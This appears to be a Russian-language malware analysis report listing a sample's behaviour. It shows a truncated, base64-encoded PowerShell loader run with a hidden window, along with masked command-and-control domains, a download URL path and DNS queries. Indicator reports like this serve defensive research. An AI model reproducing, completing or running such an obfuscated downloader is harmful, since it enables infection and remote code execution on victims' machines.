Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAHQAagBwADQANgAwAD0AKAAnAEoAdQAnACsAKAAnADgAOABsACcAKwAnADAAaQAnACkAKQA7ACQARABuAHIAeQAxAHoAagA9ACQASwAxAHgAegByAGoAZgAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1380
- %TEMP%\1043631.cvr
- 'ne###ontec.com':443
- 'x1.#.lencr.org':80
- 'ki##oo.com':80
- 'ma###ragida.com':80
- 'xi###echen.com':80
- http://x1.#.lencr.org/
- http://ki##oo.com/dl/7y7I1V/
- 'ne###ontec.com':443
- DNS ASK ne###ontec.com
- DNS ASK x1.#.lencr.org
- DNS ASK ki##oo.com
- DNS ASK ma###ragida.com
- DNS ASK xi###echen.com
- DNS ASK ma######irtualcreatives.com
- DNS ASK rf##fc.com
- DNS ASK bb#.#fcrfc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABJAHQAagBwADQANgAwAD0AKAAnAEoAdQAnACsAKAAnADgAOABsACcAKwAnADAAaQAnACkAKQA7ACQARABuAHIAeQAxAHoAagA9ACQASwAxAHgAegByAGoAZgAgACsAIABbAGMAaABhAHIAXQAoADEAIAArACAAMQAgACsAIA... (со скрытым окном)